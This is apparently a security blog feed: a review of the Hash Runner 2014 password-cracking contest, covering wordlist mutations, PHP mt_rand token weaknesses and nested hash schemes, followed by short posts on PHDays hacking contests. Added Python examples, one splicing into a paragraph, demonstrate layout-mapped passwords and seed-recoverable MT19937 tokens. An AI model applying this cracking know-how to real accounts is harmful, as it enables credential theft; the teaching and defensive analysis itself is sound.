target="_blank">write-up</a>) won souvenirs.</li></ol><br />Over the three years of the contest, we have had three different winners: hashcat in 2012, john-users in 2013, and InsidePro in 2014. Every year, most submissions arrived in the last 15 minutes, so the winner was determined at the very last moment. In 2012 and 2013, InsidePro was beaten into second place by hashcat and john-users, respectively. 
This year, InsidePro finally came first.<br /><a name='more'></a><br /><b><span style="font-size: large;">Hash Types and Pricing</span></b><br />Hash prices were weighted according to our own practical needs. That was our final decision, but we had considered two other ideas: one hash giving one point, and prices calculated from both the plaintext entropy and the average cracking time (measured on our standard hardware) for the given hash type. The latter variant proved unsuitable for the competition, because only the slowest hashes would have mattered.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-8qyLnnIn0Vc/U7vQ1EBYkBI/AAAAAAAAEEo/eGFqxPqpD3c/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-08+%D0%B2+15.06.38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-8qyLnnIn0Vc/U7vQ1EBYkBI/AAAAAAAAEEo/eGFqxPqpD3c/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-08+%D0%B2+15.06.38.png" height="400" width="302" /></a></div><br />* coefficient for hashes in bonus packs<br /><br /><b><span style="font-size: large;">Contest Mechanics</span></b><br />First of all, we split the entire contest into separate tasks that reflected different systems and approaches, not only hash types. It was much like Hash Runner 2013, but without tasks being tied to wordlists whose theme could be guessed from hints or recovered plaintexts.<br /><br />One of the new features of Hash Runner 2014 was how contestants received their hashes. In previous years, it had been a plaintext file. This year, we set up a special laboratory running real-life systems. To grab the hashes, contestants followed the instructions and used exploits, as in a pentest. These tasks were fully described, leaving no room for guessing except the hash cracking itself. 
You could see PCAP files, a Lotus Domino installation, numerous web applications, SCADA project files, etc. This had no impact on scoring and was just for the pentest look & feel, and, to be honest, it became the hardest part for us to implement.<br /><br />Furthermore, a typical assessment doesn’t require all these unprivileged users; you need only the most privileged one. We added twenty-three admin hashes to each task, whose plaintexts had the largest entropy of all the task's plaintexts (twenty-three is just a number, not related in any way to the result of 966/42). If a participant managed to crack any admin hash, he/she was awarded 250 bonus hashes not available in the original task. The bonus hash types were: Raw-SHA-1, GOST, bcrypt, and Raw-MD5.<br /><br /><b><span style="font-size: large;">Accidents & Emergencies</span></b><br />As seen on the news:<br /><blockquote class="tr_bq">Results uploading was buggy if the plaintext contained ":". Not that we hadn't expected this :) </blockquote><blockquote class="tr_bq">Some piece of information: due to some of our mistakes made while dumping hashes for task #3 (md4 mt_rand), data from user.db.php and hashrunner_2014_hashes.zip did not match. The latter file was correct and hashes from it would have been accepted. The task has now become two times easier. We couldn’t disclose the exact information, because one team had found it on their own. Other teams were invited to find and use this glitch to upload hashes for this task. </blockquote><br />Awful silent patches:<br /><br /><ol style="text-align: left;"><li>Cisco hashes had been generated twice by accident and thus differed because of the salt in the algorithms.</li><li>We had wrong scores in the database for one of the bonus hashes (1 instead of 15). 
Fortunately, it was found during day one, when almost nobody had succeeded with these bonus hashes.</li><li>Some minor differences between the file with all hashes and the actual systems.</li></ol><br /><b><span style="font-size: large;">Wordlists and Mutations</span></b><br />The wordlists used came from real-life experience with a pinch of wild imagination:<br />random 6 and 8 chars, acronyms, Arabic mapped to Latin, Arabic forum (crawled), Arabic names, Canada towns, chemicals, Chinese names and surnames, Go game terms, Greek mythology, Hollywood stars, Italian cities, legendary creatures, Marvel characters, mental disorders, MMORPG sites, neurological disorders, tomato translations, web application banners and random samples from packetstorm wordlists and the xato 10k wordlist.<br /><br />The mutations used were those generally found during consulting, mixed with uncommon cases:<br /><br />• Leet everything, leet only specific alpha, leet random.<br />• Simple ones: <word><year>, <word><digit1><digit2><digit3>, <word><spec><year>, <word><date>, <word><date><month>.<br />• Permutations with case in <word> like <WoRD> and <wORD>. These mutations were mostly used in wordlists like mental disorders and legendary creatures.<br />• Ultra evil <word1><WORD2>, <word1><word2><word3>.<br />• Adding special symbols: <special1><word><special2>, <word><special1><special2><special3><special4>.<br />• Arabic mapped to Latin should also be considered a mutation. A simple Arabic wordlist was mapped to the corresponding Latin keyboard characters, just as “password” in Russian (“пароль”) typed in the English layout gives “gfhjkm”.<br /><br />All these mixed-up and mutated wordlists were randomly distributed among the tasks. The number of final plaintexts exceeded 40 thousand. 
Hopefully, we avoided attacks with themed patterns by using only small random parts of this set.<br /><br /><b><span style="font-size: large;">Review of Some Tasks</span></b><br /><br /><b>TIA Portal</b><br />The simplest task in the contest: a SCADA engineering solution that had raw SHA-1 hashes with known plaintext length. That’s it. By modifying the provided script to extract the length, as shown in the picture, you got a massive boost in cracking.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-AoKVtrycXp4/U7vReAWY65I/AAAAAAAAEE0/SxBawDaMidk/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-AoKVtrycXp4/U7vReAWY65I/AAAAAAAAEE0/SxBawDaMidk/s1600/2.png" height="430" width="640" /></a></div><br /><b>Lotus H-hash</b><br />Apart from the two known hash types, lotus5 and dominosec (g-hash), newer hashes for versions >8 were generated. While the former two types were among the most popular for cracking, the latter wasn’t touched at all. Good thing we haven’t seen them in the wild yet.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-8ocfhzplHtA/U7vRkxUWO3I/AAAAAAAAEE8/1ObL5kFNRtM/s1600/3_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-8ocfhzplHtA/U7vRkxUWO3I/AAAAAAAAEE8/1ObL5kFNRtM/s1600/3_1.png" height="130" width="640" /></a></div><br /><b>Arabic forum</b><br />This forum was all about the targeted attack. One can't simply bruteforce an iterated MD5 hash without knowing anything about the plaintext. Yes, there were “simple” hashes consisting of fewer than five English letters, but they were created by mapping from the Arabic keyboard to the English one. Most (if not all) dictionaries become useless if they are used against national alphabets. 
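The keyboard-layout mutation from the Wordlists section (“пароль” typed in the Latin layout becomes “gfhjkm”) and the digit padding used in this Arabic forum task can be undone just as mechanically as they are applied, which is what a password-policy check has to do. The following is an added example, not the contest's own code: it takes a candidate password, strips the digit mutations, reverses the layout mapping and asks whether a dictionary word is left. The Russian ЙЦУКЕН table is the one the post's own example implies; the dictionary and sample candidates are constructed here, and the assumption that the check should accept up to three ASCII digits in front and two decimal digits of any script at the end mirrors the three mutations described in this task.

```python
import re

# Russian ЙЦУКЕН layout as it sits on a US QWERTY keyboard, key for key
# (rows q..], a..', z.., plus the ` key). An Arabic table plugs in the same way.
QWERTY = "qwertyuiop[]asdfghjkl;'zxcvbnm,.`"
JCUKEN = "йцукенгшщзхъфывапролджэячсмитьбюё"
assert len(QWERTY) == len(JCUKEN)

CYR_TO_LAT = str.maketrans(JCUKEN, QWERTY)
LAT_TO_CYR = str.maketrans(QWERTY, JCUKEN)

# Constructed stand-in for the crawled wordlists.
DICTIONARY = {"пароль", "password", "tomato"}


def to_latin_layout(word):
    """The contest mutation: a Cyrillic word typed with the Latin layout active
    ("пароль" -> "gfhjkm"). Case is folded first; unmapped characters pass through."""
    return word.lower().translate(CYR_TO_LAT)


def from_latin_layout(candidate):
    """Inverse of to_latin_layout: what the user was really typing."""
    return candidate.lower().translate(LAT_TO_CYR)


def strip_digit_padding(candidate, max_prefix=3, max_suffix=2):
    """Undo the two digit mutations: up to `max_prefix` leading ASCII digits and
    up to `max_suffix` trailing decimal digits in any script (str.isdecimal is
    true for Arabic-Indic U+0660..U+0669 as well as for 0-9)."""
    core = re.sub(r"^[0-9]{1,%d}" % max_prefix, "", candidate)
    removed = 0
    while core and removed < max_suffix and core[-1].isdecimal():
        core = core[:-1]
        removed += 1
    return core


def dictionary_base(candidate, dictionary=DICTIONARY):
    """Return the dictionary word a candidate derives from under the three
    mutations, or None. Intended as a policy check at password-set time:
    reject whatever a mutated wordlist would recover in seconds."""
    core = strip_digit_padding(candidate)
    for variant in (core.lower(), from_latin_layout(core)):
        if variant in dictionary:
            return variant
    return None


if __name__ == "__main__":
    for sample in ("123gfhjkm٢٣", "Password1", "hunter2"):
        print(sample, "->", dictionary_base(sample))
```

The check deliberately tries both the raw core and the layout-reversed core, because a Latin-alphabet dictionary word and a Cyrillic word typed in the wrong layout look identical to the application storing the hash.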
The only way is to create one yourself, for example, by parsing dictionaries or targeted sites. Thus, a forum is a great place to start. It contains a vast amount of words that people actually use, and crawling such a resource can give essential information about possible plaintexts. But sometimes crawling is not enough; you should also think about common things used in uncommon ways. There are at least four types of Unicode symbols just for encoding numbers, and one of our mutation masks was simply appending two Unicode Arabic numbers to the plaintext. Actually, there were three mutations used:<br /><br /><ol style="text-align: left;"><li>Prefixing with three non-Unicode Arabic numbers.</li><li>Suffixing with two Unicode Arabic numbers.</li><li>Keyboard mapping to Latin letters.</li></ol><br /><b>mtrand()</b><br />The idea of this task was all about the bad “random” numbers that not-so-experienced developers use. Let us imagine that we have a forum/blog/any other website. All we want is a secure means to create the tokens we will use to reset user passwords. One could use a linear congruential generator, but this task was about the Mersenne twister pseudorandom generator, which is really nice on paper, with a period of 2^19937 and a seed of 32 bits. The seed is a problem for security — if we know the seed, we can reproduce the full stream of pseudorandom numbers. But this issue is implicitly mitigated by the common implementation: once the generator is seeded, its state starts to produce pseudorandom numbers different from those created by another seed. Now an attacker must implement the full Mersenne twister algorithm and bruteforce not only the seed (which is relatively small), but also the position of the target pseudorandom number in the generated stream.<br /><br />This approach should be enough for both h-type and l-type hashes, but we created two types on purpose. 
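Two things make the mt_rand token weak: the whole stream is a function of a 32-bit seed and a position, and (as the next sentences explain) the big product loses most of its digits once the language stores it as a float. The following added example, written for this write-up rather than taken from the contest, shows both in Python: a textbook MT19937 seeded with 32 bits, a token generator shaped like the post's light generate_password(), and the PHP-style float rendering of the post's own 123456789 * 123456789 * 123456789 example. Assumptions: PHP's mt_rand() of that era used its own variant of the twist, so the class reproduces the structure of the weakness, not the contest's exact values; the float rendering assumes PHP's default ini setting precision=14, which is what produces the 1.8816763717892E+24 form quoted in the post.

```python
import math


class MT19937:
    """Textbook Mersenne twister, the algorithm behind PHP's mt_rand().
    The seed is one 32-bit word, so there are only 2^32 possible streams; given
    the seed and a position, anyone can recompute the 'random' token.
    Assumption: PHP's variant differs in the twist, so values here are not the
    contest's; the structure is the point."""
    N, M = 624, 397

    def __init__(self, seed):
        self.mt = [0] * self.N
        self.mt[0] = seed & 0xFFFFFFFF
        for i in range(1, self.N):
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF
        self.index = self.N

    def _twist(self):
        for i in range(self.N):
            y = (self.mt[i] & 0x80000000) | (self.mt[(i + 1) % self.N] & 0x7FFFFFFF)
            self.mt[i] = self.mt[(i + self.M) % self.N] ^ (y >> 1)
            if y & 1:
                self.mt[i] ^= 0x9908B0DF
        self.index = 0

    def next_u32(self):
        if self.index >= self.N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & 0xFFFFFFFF


def generate_token(seed, skip, length=3):
    """Python analogue of the post's light generate_password(): seed, discard
    `skip` outputs, then multiply `length` 31-bit outputs (PHP's mt_rand() returns
    the 32-bit word >> 1). Exact integer arithmetic here; PHP overflows to float."""
    gen = MT19937(seed)
    for _ in range(skip):
        gen.next_u32()
    result = 1
    for _ in range(length):
        result *= gen.next_u32() >> 1
    return result


def php_float_echo(value, precision=14):
    """What PHP prints for a float under its default ini precision=14 (echo
    renders with %.14G: 14 significant digits plus an exponent)."""
    return f"{float(value):.{precision - 1}E}"


def exact_bits(value):
    """log2 of the integer: the space a search covers for the exact representation."""
    return math.log2(value)


def float_bits(value, precision=14):
    """The same after float rendering: every decimal digit beyond the significant
    ones is discarded, i.e. log2(10) bits per lost digit."""
    lost_digits = max(len(str(value)) - precision, 0)
    return exact_bits(value) - lost_digits * math.log2(10)


PRODUCT = 123456789 ** 3  # the post's example: 1881676371789154860897069

if __name__ == "__main__":
    print(PRODUCT, "->", php_float_echo(PRODUCT))
    print(f"exact ~{exact_bits(PRODUCT):.1f} bits, as float ~{float_bits(PRODUCT):.1f} bits")
```

Running it shows that PRODUCT and PRODUCT + 10**9 print identically once rendered as a float, so a brute-forcer never needs to distinguish them: about 36 bits of the roughly 80-bit exact value are simply gone, which is the ~45-bit figure the post gives.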
A developer can shoot himself in the foot not only by using a cryptographically insecure random number generator, but also by using the generated stream badly. When you use integer or float types in your programming language, you should remember the maximum precision of each type and the text representation of numbers. Here is an example. It might seem that if the product of three numbers 123456789 * 123456789 * 123456789 gives 1881676371789154860897069 in ordinary decimal arithmetic, then you will get ~79 bits of entropy with its character representation. However, if your programming language uses floating-point numbers to handle such big numbers, then the result will be something like 1.8816763717892E+24, which has only ~45 bits of entropy and can be easily bruteforced with any fast algorithm.<br /><br />This task was haunted by bad luck. First of all, hashes in the web database were hashed with only one iteration of MD4, and the original code generating h-hashes was a bit different from the code on the web.<br /><br />Generate light plaintexts<br /><br /><span style="font-family: Courier New, Courier, monospace;">function generate_password($length)</span><br /><span style="font-family: Courier New, Courier, monospace;">{</span><br /><span style="font-family: Courier New, Courier, monospace;"> $result = 1;</span><br /><span style="font-family: Courier New, Courier, monospace;"> for($i=0; $i<$length; ++$i) $result *= mt_rand();</span><br /><span style="font-family: Courier New, Courier, monospace;"> return $result;</span><br /><span style="font-family: Courier New, Courier, monospace;">}</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">for ($i=0; $i<$argv[1]; ++$i)</span><br /><span style="font-family: Courier New, Courier, monospace;">{</span><br /><span style="font-family: Courier New, Courier, monospace;"> if (($i % 32) == 0){</span><br /><span style="font-family: 
Courier New, Courier, monospace;"> mt_srand(get_real_rand());</span><br /><span style="font-family: Courier New, Courier, monospace;"> $skip = get_real_rand() & 0xFFFF + 8192; // Fix for easy attack</span><br /><span style="font-family: Courier New, Courier, monospace;"> for ($j=0; $j<$skip; ++$j)</span><br /><span style="font-family: Courier New, Courier, monospace;"> mt_rand();</span><br /><span style="font-family: Courier New, Courier, monospace;"> }</span><br /><span style="font-family: Courier New, Courier, monospace;"> echo generate_password(3)."\n";</span><br /><span style="font-family: Courier New, Courier, monospace;"> $skip = get_real_rand() & 0xFF; // Fix for easy attack</span><br /><span style="font-family: Courier New, Courier, monospace;"> for ($j=0; $j<$skip; ++$j)</span><br /><span style="font-family: Courier New, Courier, monospace;"> mt_rand();</span><br /><span style="font-family: Courier New, Courier, monospace;">}</span><br /><br />Generate hard plaintexts<br /><br /><span style="font-family: Courier New, Courier, monospace;">function generate_password($length)</span><br /><span style="font-family: Courier New, Courier, monospace;">{</span><br /><span style="font-family: Courier New, Courier, monospace;"> $result = 1;</span><br /><span style="font-family: Courier New, Courier, monospace;"> for($i=0; $i<$length; ++$i) $result .= mt_rand();</span><br /><span style="font-family: Courier New, Courier, monospace;"> return $result;</span><br /><span style="font-family: Courier New, Courier, monospace;">}</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">for ($i=0; $i<$argv[1]; ++$i)</span><br /><span style="font-family: Courier New, Courier, monospace;">{</span><br /><span style="font-family: Courier New, Courier, monospace;"> if (($i % 32) == 0){</span><br /><span style="font-family: Courier New, Courier, monospace;"> mt_srand(get_real_rand());</span><br 
/><span style="font-family: Courier New, Courier, monospace;"> $skip = get_real_rand() & 0xFFFF + 128; // Fix for easy attack</span><br /><span style="font-family: Courier New, Courier, monospace;"> for ($j=0; $j<$skip; ++$j)</span><br /><span style="font-family: Courier New, Courier, monospace;"> mt_rand();</span><br /><span style="font-family: Courier New, Courier, monospace;"> }</span><br /><span style="font-family: Courier New, Courier, monospace;"> echo generate_password(3)."\n";</span><br /><span style="font-family: Courier New, Courier, monospace;"> $skip = get_real_rand() & 0xFF; // Fix for easy attack</span><br /><span style="font-family: Courier New, Courier, monospace;"> for ($j=0; $j<$skip; ++$j)</span><br /><span style="font-family: Courier New, Courier, monospace;"> mt_rand();</span><br /><span style="font-family: Courier New, Courier, monospace;">}</span><br />As you can see, there is concatenation with a non-empty string containing the number 1, so the numbers generated this way were effectively unbrutable, even if someone had managed to recreate MT rand generation or had used Solar Designer's code (<a href="http://www.openwall.com/php_mt_seed/">http://www.openwall.com/php_mt_seed/</a>).<br /><br /><b>Tomato</b><br />Ντομάτα, домат, Парадајз, Помідор, томат, улаанлооль, Լոլիկ, პომიდორი, टमाटर, टोमॅटो, हिण्डीरः, ਟਮਾਟਰ, ಟೊಮೇಟೊ, தக்காளி, තක්කාලි, 番茄, 蕃茄, …<br />No comments.<br /><br /><b>Wonderful</b><br />We received many questions about this task and the methods we would suggest to solve it. Actually, we don't know. This task (and mt_rand with Arabic) was developed to draw attention to some weaknesses of the current bruteforce utilities. During our work, we managed to find various old/unpopular applications. Many of them use just plain MD5, but some use very weird schemes like SHA1(base64(MD5(base64(SHA1())))). SHA1 is widely used, base64 is cheap, but there is no obvious way to handle such a hash. 
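Nested schemes like the one quoted above are awkward for fixed-format tools, yet trivial to express as a chain of bytes-to-bytes modules; the HMAC remark in this section rests on a related fact, that RFC 2104 hashes any key longer than the block size down to one digest before use. The following is an added example, not code from the contest or from any of the applications mentioned: a small parser that turns a scheme string into an ordered module list, an evaluator and constant-time verifier for migrating or auditing such legacy stores, and a check that an HMAC keyed with a 1 MB file equals one keyed with that file's 20-byte SHA-1. The scheme string, the sample password and the 1 MiB key are constructed; the choice to pass digests between modules as lowercase hex text (the way PHP-era code chained md5()/sha1() results) is an assumption.

```python
import base64
import hashlib
import hmac
import re

# Constructed scheme string in the nesting the post quotes from an old application.
SCHEME = "sha1(base64(md5(base64(sha1($p)))))"

# Primitive modules, each bytes -> bytes so they can chain in any order.
# Assumption: digests travel as lowercase hex text, as PHP string code would do it.
MODULES = {
    "md5": lambda data: hashlib.md5(data).hexdigest().encode(),
    "sha1": lambda data: hashlib.sha1(data).hexdigest().encode(),
    "sha256": lambda data: hashlib.sha256(data).hexdigest().encode(),
    "base64": base64.b64encode,
}

TOKEN = re.compile(r"[a-z0-9]+|\(|\)|\$p")


def parse_scheme(scheme):
    """'sha1(base64(md5($p)))' -> ['md5', 'base64', 'sha1'] (innermost applied first)."""
    names, depth, saw_input = [], 0, False
    for tok in TOKEN.findall(scheme.replace(" ", "").lower()):
        if tok == "(":
            depth += 1
        elif tok == ")":
            depth -= 1
        elif tok == "$p":
            saw_input = True
        elif tok in MODULES:
            names.append(tok)
        else:
            raise ValueError(f"unknown module {tok!r}")
    if depth != 0 or not saw_input or not names:
        raise ValueError("malformed scheme")
    return names[::-1]


def evaluate(scheme, password):
    """Run the password through the chain; returns the text the application stores."""
    data = password.encode()
    for name in parse_scheme(scheme):
        data = MODULES[name](data)
    return data.decode()


def verify(scheme, password, stored):
    """Constant-time comparison of a candidate against a stored chained hash."""
    return hmac.compare_digest(evaluate(scheme, password), stored)


# HMAC: a key longer than the block size is replaced by H(key) before use (RFC 2104),
# so a 1 MB key file is exactly as strong as its single digest.
BIG_KEY = bytes(range(256)) * 4096  # constructed 1 MiB key


def hmac_key_reduces(long_key, message, algo="sha1"):
    """Return (HMAC(long_key) == HMAC(H(long_key)), H(long_key) as hex)."""
    block_size = hashlib.new(algo).block_size
    if len(long_key) <= block_size:
        raise ValueError("key is not longer than the block size; nothing is reduced")
    reduced = hashlib.new(algo, long_key).digest()
    same = hmac.compare_digest(hmac.new(long_key, message, algo).digest(),
                               hmac.new(reduced, message, algo).digest())
    return same, reduced.hex()


if __name__ == "__main__":
    print(parse_scheme(SCHEME), evaluate(SCHEME, "password"))
    print(hmac_key_reduces(BIG_KEY, b"reset-token-17"))
```

Because the modules share one bytes-to-bytes signature, adding another primitive is a one-line dictionary entry, which is the "arbitrary combination" idea rather than a hand-written module per scheme.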
The idea to create a self-servicing module for such a task is not feasible, but the idea of a tool combining different bruteforce modules in an arbitrary manner could be good. And don't forget to optimize HMAC with a 1 MB file, as it will just be hashed down to a small constant value :)<br /><br /><b><span style="font-size: large;">Statistics</span></b><br />Some nice graphics based on submissions during the contest. We hope you will find them interesting, and we are sorry if we disclose more information about the top-3 teams’ strategy than they would wish.<br /><br />Graph by points<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-PzbT2Xysvss/U7vSDoX_yHI/AAAAAAAAEFE/Q8MCyDQzIRY/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-PzbT2Xysvss/U7vSDoX_yHI/AAAAAAAAEFE/Q8MCyDQzIRY/s1600/4.png" height="440" width="640" /></a></div><br /> Graph by the number of hashes<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-K8s5abbldow/U7vSIjXaaCI/AAAAAAAAEFM/GrBxzMPgOSY/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-K8s5abbldow/U7vSIjXaaCI/AAAAAAAAEFM/GrBxzMPgOSY/s1600/5.png" height="440" width="640" /></a></div><br /> Cumulative progress of all teams by the percentage of bruted hashes<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-_7tkcX8f6o4/U7vSNUxmAkI/AAAAAAAAEFU/Mf0zO1YraKo/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-_7tkcX8f6o4/U7vSNUxmAkI/AAAAAAAAEFU/Mf0zO1YraKo/s1600/6.png" height="436" width="640" /></a></div><br />Cumulative progress of all teams by the percentage of bruted hashes of different types<br /><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="http://4.bp.blogspot.com/-BFvzKXxZZFI/U7vSWTX0VWI/AAAAAAAAEFc/SERhT1D9XOc/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-BFvzKXxZZFI/U7vSWTX0VWI/AAAAAAAAEFc/SERhT1D9XOc/s1600/7.png" height="444" width="640" /></a></div><br />Part 1<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-uQxAw8jo5EE/U7vSbwRRBTI/AAAAAAAAEFk/nqMGk37fePo/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-uQxAw8jo5EE/U7vSbwRRBTI/AAAAAAAAEFk/nqMGk37fePo/s1600/8.png" height="442" width="640" /></a></div><br />Part 2 (pay attention to the maximum value here)<br /><br />Progress of InsidePro by hash type<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-WD3tsA28d4M/U7vSfxJTImI/AAAAAAAAEFs/keH3ptCklmw/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-WD3tsA28d4M/U7vSfxJTImI/AAAAAAAAEFs/keH3ptCklmw/s1600/9.png" height="442" width="640" /></a></div><br /> Progress of hashcat by hash type<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--qKGIs1krzM/U7vSkjUhklI/AAAAAAAAEF0/O30861VYFN0/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/--qKGIs1krzM/U7vSkjUhklI/AAAAAAAAEF0/O30861VYFN0/s1600/10.png" height="450" width="640" /></a></div><br /> Progress of john-users by hash type<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-DtzDhtH8qrI/U7vSyLtsEvI/AAAAAAAAEF8/-jO-E1Ocy-Q/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-DtzDhtH8qrI/U7vSyLtsEvI/AAAAAAAAEF8/-jO-E1Ocy-Q/s1600/11.png" height="444" width="640" 
/></a></div><br /><br /><b><span style="font-size: large;">Epilogue</span></b><br />It all started with beer in a Hamburg cafe during 30C3, and not everything turned out as expected ;)<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ufwerZpYF6w/U7vTPv0W19I/AAAAAAAAEGM/xwJ41mhh1Cc/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ufwerZpYF6w/U7vTPv0W19I/AAAAAAAAEGM/xwJ41mhh1Cc/s1600/13.png" height="557" width="640" /></a></div><br /></div><a href="http://i.imgur.com/4IgyXny.png">Full size</a></div>Unknownnoreply@blogger.com933tag:blogger.com,1999:blog-5176771794789502609.post-25209564719948312682014-06-23T15:23:00.000+04:002014-06-23T15:23:03.214+04:00Survive Hacking at PHDays. Cyber Threats of a Common Apartment<div dir="ltr" style="text-align: left;" trbidi="on">The items and devices we use are becoming more and more convenient. Today, we have an internet connection in our cars and even in certain kinds of microwaves and fridges. According to Gartner, by 2020 there will be more than 26 billion intelligent home appliances, and the market size will grow to 300 billion dollars.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-xU71rk4cU_c/U6gNS19IqVI/AAAAAAAAED4/Svnm3Wyz5z4/s1600/insane.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-xU71rk4cU_c/U6gNS19IqVI/AAAAAAAAED4/Svnm3Wyz5z4/s1600/insane.png" height="426" width="640" /></a></div><br /><br />However, few people realize that common computers with internet access and the gadgets that make up the so-called internet of things are vulnerable to attacks. 
<a href="http://www.phdays.com/" target="_blank">PHDays</a> organizers created a model of a real apartment equipped with various electrical appliances and a smart home system in order to demonstrate the possible consequences of hackers' attacks. Due to an error, all the devices in the apartment had gone insane and become a trial for the owner. Contest participants needed to free him.<br /><a name='more'></a><br />The smart home appliances were controlled by a controller, which regulated the lighting and water systems, the TV, a vacuum cleaner and other appliances.<br /><br />Anyone getting inside had to go through an identification process. A person's height and weight were measured by various sensors, and a palm recognition system was installed as well.<br /><br />After the identification process was completed, the system unlocked a control HMI. Contestants could access the HMI using a tablet left in the apartment, but they needed to unlock it first. There was a defect in Android's Face Unlock technology: it could be bypassed by holding the owner's photo (there was one on the wall) up to the tablet's camera. A participant could also unlock the tablet by beating the artificial intelligence at a game of chess.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-f8HGEydbWXU/U6gNqLkonMI/AAAAAAAAEEA/9JkEPxPrQs4/s1600/IMG_5081.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-f8HGEydbWXU/U6gNqLkonMI/AAAAAAAAEEA/9JkEPxPrQs4/s1600/IMG_5081.jpg" height="640" width="426" /></a></div><br />Each task had alternative solutions that involved detecting and exploiting vulnerabilities in the system. "Undocumented features" that allowed bypassing the devices' logical operation originated from the incorrect implementation of client-server interaction. 
But unfortunately, only a few participants used their hacking skills.<br /><br />To win, a contestant needed to solve all the tasks and gain control over the smart home system faster than the competitors. A participant with the nickname Cryden became the winner with a time of 6 minutes and 3 seconds.<br /><br />The Survive Hacking contest is a continuation of last year's Labyrinth competition, which took place at Positive Hack Days III. In that competition, participants needed to clear obstacles: rooms with a laser field, motion detectors, etc.<br /><br /></div>Unknownnoreply@blogger.com121tag:blogger.com,1999:blog-5176771794789502609.post-80654639970184476482014-06-19T12:47:00.000+04:002014-06-19T12:47:16.203+04:00PHDays IV CTF: How It Was<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-WGoraqjQwLs/U6Kh4wzsE0I/AAAAAAAAEC0/qfOuKY3HA3o/s1600/ctf1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-WGoraqjQwLs/U6Kh4wzsE0I/AAAAAAAAEC0/qfOuKY3HA3o/s1600/ctf1.png" height="282" width="640" /></a></div>Positive Hack Days IV, which was held on May 21 and 22, traditionally hosted a CTF contest. Over two days, ten teams from six countries hacked rivals' networks and beat back attacks.<br /><br />The game infrastructure and tasks of Positive Hack Days CTF are usually designed around a legend that adds special appeal to the contest. During last year's CTF, participants became the saviors of the fictional world D’Errorim. As they solved the tasks, they realized that they were fighting on the wrong side, and now their own home is <a href="http://www.phdays.com/ctf/quals-iv/" target="_blank">in danger</a>. 
